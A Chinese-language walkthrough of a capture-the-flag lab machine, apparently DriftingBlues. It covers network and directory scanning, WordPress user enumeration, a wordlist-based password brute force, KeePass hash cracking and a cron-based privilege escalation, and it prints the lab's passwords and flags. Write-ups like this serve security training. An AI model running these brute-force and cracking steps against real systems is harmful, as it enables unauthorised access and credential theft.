信息搜集

主机扫描

arp-scan -l

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.43
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 04:14 EDT
Nmap scan report for 192.168.254.43
Host is up (0.00045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:CA:4D:E5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

路径扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -b 403,404 -x php,txt,jpg,html,txt,zip  -u http://192.168.254.43
===============================================================
 
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.254.43/wp-content/]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.254.43/]
/wp-login.php         (Status: 200) [Size: 6675]
/license.txt          (Status: 200) [Size: 19915]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.254.43/wp-includes/]
/readme.html          (Status: 200) [Size: 7278]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.254.43/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.254.43/wp-login.php?action=register]
Progress: 1245858 / 1245864 (100.00%)

发现登录界面，且发现是wordpress页面，于是有两个思路

1. 利用sql注入
2. 利用wpscan漏洞扫描

结果是发现利用wpscan扫描用户

获取shell

WPScan使用方法 - 吃不胖的ruanruan - 博客园 (cnblogs.com)

利用wpscan可以扫描用户名，然后利用cewl生成字典，爆破密码

wpscan --url  http://192.168.254.43 --enumerate u
[i] User(s) Identified:
 
[+] abuzerkomurcu
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.254.43/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
 
[+] gadd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 
[+] gill
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 
[+] collins
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 
[+] satanic
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

生成字典

┌──(root㉿kali)-[~/blue5]
└─# cewl -d 2 -m 4 -w passwd --with-numbers http://192.168.254.43/       
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

之后再进行爆破用户名，可以利用wpscan

┌──(root㉿kali)-[~/blue5]
└─# wpscan --url  http://192.168.254.43 --usernames user.txt --passwords passwd
[!] Valid Combinations Found:
 | Username: gill, Password: interchangeable
成功发现用户名和密码

在媒体页面发现一个图片，下载分析，发现ssh登录密码

直接ssh登录，获得user.txt

ssh gill@ip 
gill@driftingblues:~$ cat user.txt
F83FC7429857283616AE62F8B64143E6

提权

接着我们发现在gill目录下，有一个秘钥文件/keyfile.kdbx,搜索发现需要用到工具去解决

keepass2john keyfile.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre       (keyfile)
keepass2 keyfile.kdbx
输入密码，发现秘钥名和秘钥

到这没什么思路，于是通过老方法一个一个试

1. sudo -l 无法使用
2. find / -perm -u=s -type f 2>/dev/null 也没有发现什么可以利用的命令
3. 定时文件也没有什么可以利用的
4. /usr/sbin/getcap -r 2>/dev/null 也没有什么可以利用的
5. find / -writable 2>/dev/null 没有什么可以写的文件

没法子了，通过师傅的wp才发现，把我兄弟linpeas.sh和pspy64给忘了，哈哈哈哈哈

通过linpeas.sh，发现一个可以的秘钥文件

╔══════════╣ Unexpected in root
/vmlinuz.old                                                                                                                                                  
/initrd.img
/initrd.img.old
/vmlinuz
/keyfolder

通过pspy64发现一个定时文件,秘钥的文件定时执行，很好玩，但并不知道这个秘钥脚本是干什么的，这就很头疼，通过师傅的wp，猜测是将秘钥名写入秘钥文件中，也就是/keyfolder中

2024/05/29 07:04:49 CMD: UID=0     PID=1      | /sbin/init 
2024/05/29 07:05:01 CMD: UID=0     PID=13750  | /usr/sbin/CRON -f 
2024/05/29 07:05:01 CMD: UID=0     PID=13751  | /usr/sbin/CRON -f 
2024/05/29 07:05:01 CMD: UID=0     PID=13752  | /bin/sh -c /root/key.sh 
2024/05/29 07:05:01 CMD: UID=0     PID=13753  | /bin/bash /root/key.sh 
2024/05/29 07:05:49 CMD: UID=0     PID=13754  | 
2024/05/29 07:06:01 CMD: UID=0     PID=13755  | /usr/sbin/CRON -f 
2024/05/29 07:06:01 CMD: UID=0     PID=13756  | /usr/sbin/CRON -f 
2024/05/29 07:06:01 CMD: UID=0     PID=13757  | /bin/sh -c /root/key.sh 
2024/05/29 07:06:01 CMD: UID=0     PID=13758  | /bin/bash /root/key.sh 

通过师傅的wp发现需要先写入秘钥文件名，并且需要一个一个写，也就是需要一个一个名字试，不能一次性全部写入keyfloder中，这样才能执行成功

touch fracturedocean
gill@driftingblues:/keyfolder$ ls -la
total 12
drwx---rwx  2 root root 4096 May 29 08:01 .
drwxr-xr-x 19 root root 4096 Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 29 07:57 fracturedocean
-rw-r--r--  1 root root   29 May 29 08:01 rootcreds.txt
gill@driftingblues:/keyfolder$ cat rootcreds.txt 
root creds
 
imjustdrifting31

获得root

root@driftingblues:~# cat root.txt
9EFF53317826250071574B4D4EE56840 

我们在分析key.sh文件

root@driftingblues:~# cat key.sh
#!/bin/bash
if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
        echo "root creds" >> /keyfolder/rootcreds.txt
        echo "" >> /keyfolder/rootcreds.txt
        echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi
意思就是/keyflode文件中如果含有fracturedocean这个文件，就会将root的密码输入到rootcreds文件里，也就是root的秘钥文件中，很有意思的一个脚本，这种提权方式还真是第一次见

知识点

1. cewl搜集信息
2. wpscan的使用
3. 通过猜测脚本内容来提权